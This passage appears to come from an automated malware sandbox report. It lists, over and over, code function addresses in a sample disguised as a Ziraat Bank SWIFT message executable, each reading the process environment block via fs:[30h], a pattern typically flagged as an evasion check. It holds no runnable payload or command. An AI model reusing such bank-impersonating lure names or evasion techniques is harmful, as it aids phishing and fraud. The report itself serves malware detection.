Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_013349A4 mov eax, dword ptr fs:[00000030h] 6_2_013349A4
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_013349A4 mov eax, dword ptr fs:[00000030h] 6_2_013349A4
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_013349A4 mov eax, dword ptr fs:[00000030h] 6_2_013349A4
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_013349A4 mov eax, dword ptr fs:[00000030h] 6_2_013349A4
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0129C182 mov eax, dword ptr fs:[00000030h] 6_2_0129C182
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012AA185 mov eax, dword ptr fs:[00000030h] 6_2_012AA185
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012A2990 mov eax, dword ptr fs:[00000030h] 6_2_012A2990
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0127B1E1 mov eax, dword ptr fs:[00000030h] 6_2_0127B1E1
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0127B1E1 mov eax, dword ptr fs:[00000030h] 6_2_0127B1E1
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0127B1E1 mov eax, dword ptr fs:[00000030h] 6_2_0127B1E1
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_013041E8 mov eax, dword ptr fs:[00000030h] 6_2_013041E8
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0128B02A mov eax, dword ptr fs:[00000030h] 6_2_0128B02A
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0128B02A mov eax, dword ptr fs:[00000030h] 6_2_0128B02A
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0128B02A mov eax, dword ptr fs:[00000030h] 6_2_0128B02A
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0128B02A mov eax, dword ptr fs:[00000030h] 6_2_0128B02A
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012A002D mov eax, dword ptr fs:[00000030h] 6_2_012A002D
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012A002D mov eax, dword ptr fs:[00000030h] 6_2_012A002D
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012A002D mov eax, dword ptr fs:[00000030h] 6_2_012A002D
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012A002D mov eax, dword ptr fs:[00000030h] 6_2_012A002D
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012A002D mov eax, dword ptr fs:[00000030h] 6_2_012A002D
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0129A830 mov eax, dword ptr fs:[00000030h] 6_2_0129A830
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0129A830 mov eax, dword ptr fs:[00000030h] 6_2_0129A830
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0129A830 mov eax, dword ptr fs:[00000030h] 6_2_0129A830
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0129A830 mov eax, dword ptr fs:[00000030h] 6_2_0129A830
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01344015 mov eax, dword ptr fs:[00000030h] 6_2_01344015
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01344015 mov eax, dword ptr fs:[00000030h] 6_2_01344015
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012F7016 mov eax, dword ptr fs:[00000030h] 6_2_012F7016
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012F7016 mov eax, dword ptr fs:[00000030h] 6_2_012F7016
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012F7016 mov eax, dword ptr fs:[00000030h] 6_2_012F7016
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01332073 mov eax, dword ptr fs:[00000030h] 6_2_01332073
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01341074 mov eax, dword ptr fs:[00000030h] 6_2_01341074
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01290050 mov eax, dword ptr fs:[00000030h] 6_2_01290050
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01290050 mov eax, dword ptr fs:[00000030h] 6_2_01290050
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012B90AF mov eax, dword ptr fs:[00000030h] 6_2_012B90AF
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012A20A0 mov eax, dword ptr fs:[00000030h] 6_2_012A20A0
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012A20A0 mov eax, dword ptr fs:[00000030h] 6_2_012A20A0
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012A20A0 mov eax, dword ptr fs:[00000030h] 6_2_012A20A0
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012A20A0 mov eax, dword ptr fs:[00000030h] 6_2_012A20A0
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012A20A0 mov eax, dword ptr fs:[00000030h] 6_2_012A20A0
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012A20A0 mov eax, dword ptr fs:[00000030h] 6_2_012A20A0
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012AF0BF mov ecx, dword ptr fs:[00000030h] 6_2_012AF0BF
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012AF0BF mov eax, dword ptr fs:[00000030h] 6_2_012AF0BF
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012AF0BF mov eax, dword ptr fs:[00000030h] 6_2_012AF0BF
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01279080 mov eax, dword ptr fs:[00000030h] 6_2_01279080
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012F3884 mov eax, dword ptr fs:[00000030h] 6_2_012F3884
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012F3884 mov eax, dword ptr fs:[00000030h] 6_2_012F3884
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012740E1 mov eax, dword ptr fs:[00000030h] 6_2_012740E1
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012740E1 mov eax, dword ptr fs:[00000030h] 6_2_012740E1
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012740E1 mov eax, dword ptr fs:[00000030h] 6_2_012740E1
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012758EC mov eax, dword ptr fs:[00000030h] 6_2_012758EC
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0129B8E4 mov eax, dword ptr fs:[00000030h] 6_2_0129B8E4
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0129B8E4 mov eax, dword ptr fs:[00000030h] 6_2_0129B8E4
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0130B8D0 mov eax, dword ptr fs:[00000030h] 6_2_0130B8D0
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0130B8D0 mov ecx, dword ptr fs:[00000030h] 6_2_0130B8D0
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0130B8D0 mov eax, dword ptr fs:[00000030h] 6_2_0130B8D0
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0130B8D0 mov eax, dword ptr fs:[00000030h] 6_2_0130B8D0
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0130B8D0 mov eax, dword ptr fs:[00000030h] 6_2_0130B8D0
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0130B8D0 mov eax, dword ptr fs:[00000030h] 6_2_0130B8D0
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0133131B mov eax, dword ptr fs:[00000030h] 6_2_0133131B
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0127DB60 mov ecx, dword ptr fs:[00000030h] 6_2_0127DB60
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012A3B7A mov eax, dword ptr fs:[00000030h] 6_2_012A3B7A
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012A3B7A mov eax, dword ptr fs:[00000030h] 6_2_012A3B7A
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0127DB40 mov eax, dword ptr fs:[00000030h] 6_2_0127DB40
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01348B58 mov eax, dword ptr fs:[00000030h] 6_2_01348B58
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0127F358 mov eax, dword ptr fs:[00000030h] 6_2_0127F358
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012A4BAD mov eax, dword ptr fs:[00000030h] 6_2_012A4BAD
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012A4BAD mov eax, dword ptr fs:[00000030h] 6_2_012A4BAD
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012A4BAD mov eax, dword ptr fs:[00000030h] 6_2_012A4BAD
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01345BA5 mov eax, dword ptr fs:[00000030h] 6_2_01345BA5
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01281B8F mov eax, dword ptr fs:[00000030h] 6_2_01281B8F
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01281B8F mov eax, dword ptr fs:[00000030h] 6_2_01281B8F
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0132D380 mov ecx, dword ptr fs:[00000030h] 6_2_0132D380
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0133138A mov eax, dword ptr fs:[00000030h] 6_2_0133138A
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012AB390 mov eax, dword ptr fs:[00000030h] 6_2_012AB390
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012A2397 mov eax, dword ptr fs:[00000030h] 6_2_012A2397
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0129DBE9 mov eax, dword ptr fs:[00000030h] 6_2_0129DBE9
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012A03E2 mov eax, dword ptr fs:[00000030h] 6_2_012A03E2
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012A03E2 mov eax, dword ptr fs:[00000030h] 6_2_012A03E2
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012A03E2 mov eax, dword ptr fs:[00000030h] 6_2_012A03E2
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012A03E2 mov eax, dword ptr fs:[00000030h] 6_2_012A03E2
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012A03E2 mov eax, dword ptr fs:[00000030h] 6_2_012A03E2
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012A03E2 mov eax, dword ptr fs:[00000030h] 6_2_012A03E2
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012F53CA mov eax, dword ptr fs:[00000030h] 6_2_012F53CA
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012F53CA mov eax, dword ptr fs:[00000030h] 6_2_012F53CA
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0129A229 mov eax, dword ptr fs:[00000030h] 6_2_0129A229
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0129A229 mov eax, dword ptr fs:[00000030h] 6_2_0129A229
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0129A229 mov eax, dword ptr fs:[00000030h] 6_2_0129A229
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0129A229 mov eax, dword ptr fs:[00000030h] 6_2_0129A229
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0129A229 mov eax, dword ptr fs:[00000030h] 6_2_0129A229
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0129A229 mov eax, dword ptr fs:[00000030h] 6_2_0129A229
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0129A229 mov eax, dword ptr fs:[00000030h] 6_2_0129A229
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0129A229 mov eax, dword ptr fs:[00000030h] 6_2_0129A229
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0129A229 mov eax, dword ptr fs:[00000030h] 6_2_0129A229
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012B4A2C mov eax, dword ptr fs:[00000030h] 6_2_012B4A2C
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012B4A2C mov eax, dword ptr fs:[00000030h] 6_2_012B4A2C
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01288A0A mov eax, dword ptr fs:[00000030h] 6_2_01288A0A
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0133AA16 mov eax, dword ptr fs:[00000030h] 6_2_0133AA16
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0133AA16 mov eax, dword ptr fs:[00000030h] 6_2_0133AA16
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0127AA16 mov eax, dword ptr fs:[00000030h] 6_2_0127AA16
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0127AA16 mov eax, dword ptr fs:[00000030h] 6_2_0127AA16
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01293A1C mov eax, dword ptr fs:[00000030h] 6_2_01293A1C
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01275210 mov eax, dword ptr fs:[00000030h] 6_2_01275210
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01275210 mov ecx, dword ptr fs:[00000030h] 6_2_01275210
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01275210 mov eax, dword ptr fs:[00000030h] 6_2_01275210
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01275210 mov eax, dword ptr fs:[00000030h] 6_2_01275210
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012B927A mov eax, dword ptr fs:[00000030h] 6_2_012B927A
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0132B260 mov eax, dword ptr fs:[00000030h] 6_2_0132B260
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0132B260 mov eax, dword ptr fs:[00000030h] 6_2_0132B260
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01348A62 mov eax, dword ptr fs:[00000030h] 6_2_01348A62
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0133EA55 mov eax, dword ptr fs:[00000030h] 6_2_0133EA55
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01279240 mov eax, dword ptr fs:[00000030h] 6_2_01279240
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01279240 mov eax, dword ptr fs:[00000030h] 6_2_01279240
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01279240 mov eax, dword ptr fs:[00000030h] 6_2_01279240
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01279240 mov eax, dword ptr fs:[00000030h] 6_2_01279240
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01304257 mov eax, dword ptr fs:[00000030h] 6_2_01304257
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012752A5 mov eax, dword ptr fs:[00000030h] 6_2_012752A5
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012752A5 mov eax, dword ptr fs:[00000030h] 6_2_012752A5
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012752A5 mov eax, dword ptr fs:[00000030h] 6_2_012752A5
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012752A5 mov eax, dword ptr fs:[00000030h] 6_2_012752A5
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012752A5 mov eax, dword ptr fs:[00000030h] 6_2_012752A5
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0128AAB0 mov eax, dword ptr fs:[00000030h] 6_2_0128AAB0
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0128AAB0 mov eax, dword ptr fs:[00000030h] 6_2_0128AAB0
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012AFAB0 mov eax, dword ptr fs:[00000030h] 6_2_012AFAB0
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012AD294 mov eax, dword ptr fs:[00000030h] 6_2_012AD294
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012AD294 mov eax, dword ptr fs:[00000030h] 6_2_012AD294
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012A2AE4 mov eax, dword ptr fs:[00000030h] 6_2_012A2AE4
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012A2ACB mov eax, dword ptr fs:[00000030h] 6_2_012A2ACB
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01348D34 mov eax, dword ptr fs:[00000030h] 6_2_01348D34
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0133E539 mov eax, dword ptr fs:[00000030h] 6_2_0133E539
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012A4D3B mov eax, dword ptr fs:[00000030h] 6_2_012A4D3B
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012A4D3B mov eax, dword ptr fs:[00000030h] 6_2_012A4D3B
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012A4D3B mov eax, dword ptr fs:[00000030h] 6_2_012A4D3B
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0127AD30 mov eax, dword ptr fs:[00000030h] 6_2_0127AD30
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012FA537 mov eax, dword ptr fs:[00000030h] 6_2_012FA537
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01283D34 mov eax, dword ptr fs:[00000030h] 6_2_01283D34
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01283D34 mov eax, dword ptr fs:[00000030h] 6_2_01283D34
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01283D34 mov eax, dword ptr fs:[00000030h] 6_2_01283D34
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01283D34 mov eax, dword ptr fs:[00000030h] 6_2_01283D34
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01283D34 mov eax, dword ptr fs:[00000030h] 6_2_01283D34
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01283D34 mov eax, dword ptr fs:[00000030h] 6_2_01283D34
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01283D34 mov eax, dword ptr fs:[00000030h] 6_2_01283D34
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01283D34 mov eax, dword ptr fs:[00000030h] 6_2_01283D34
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01283D34 mov eax, dword ptr fs:[00000030h] 6_2_01283D34
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01283D34 mov eax, dword ptr fs:[00000030h] 6_2_01283D34
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01283D34 mov eax, dword ptr fs:[00000030h] 6_2_01283D34
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01283D34 mov eax, dword ptr fs:[00000030h] 6_2_01283D34
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01283D34 mov eax, dword ptr fs:[00000030h] 6_2_01283D34
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0129C577 mov eax, dword ptr fs:[00000030h] 6_2_0129C577
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0129C577 mov eax, dword ptr fs:[00000030h] 6_2_0129C577
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012B3D43 mov eax, dword ptr fs:[00000030h] 6_2_012B3D43
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012F3540 mov eax, dword ptr fs:[00000030h] 6_2_012F3540
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01323D40 mov eax, dword ptr fs:[00000030h] 6_2_01323D40
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01297D50 mov eax, dword ptr fs:[00000030h] 6_2_01297D50
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012A35A1 mov eax, dword ptr fs:[00000030h] 6_2_012A35A1
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_013405AC mov eax, dword ptr fs:[00000030h] 6_2_013405AC
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_013405AC mov eax, dword ptr fs:[00000030h] 6_2_013405AC
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012A1DB5 mov eax, dword ptr fs:[00000030h] 6_2_012A1DB5
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012A1DB5 mov eax, dword ptr fs:[00000030h] 6_2_012A1DB5
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012A1DB5 mov eax, dword ptr fs:[00000030h] 6_2_012A1DB5
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012A2581 mov eax, dword ptr fs:[00000030h] 6_2_012A2581
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012A2581 mov eax, dword ptr fs:[00000030h] 6_2_012A2581
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012A2581 mov eax, dword ptr fs:[00000030h] 6_2_012A2581
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012A2581 mov eax, dword ptr fs:[00000030h] 6_2_012A2581
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01272D8A mov eax, dword ptr fs:[00000030h] 6_2_01272D8A
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01272D8A mov eax, dword ptr fs:[00000030h] 6_2_01272D8A
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01272D8A mov eax, dword ptr fs:[00000030h] 6_2_01272D8A
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01272D8A mov eax, dword ptr fs:[00000030h] 6_2_01272D8A
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01272D8A mov eax, dword ptr fs:[00000030h] 6_2_01272D8A
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012AFD9B mov eax, dword ptr fs:[00000030h] 6_2_012AFD9B
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012AFD9B mov eax, dword ptr fs:[00000030h] 6_2_012AFD9B
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01328DF1 mov eax, dword ptr fs:[00000030h] 6_2_01328DF1
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0128D5E0 mov eax, dword ptr fs:[00000030h] 6_2_0128D5E0
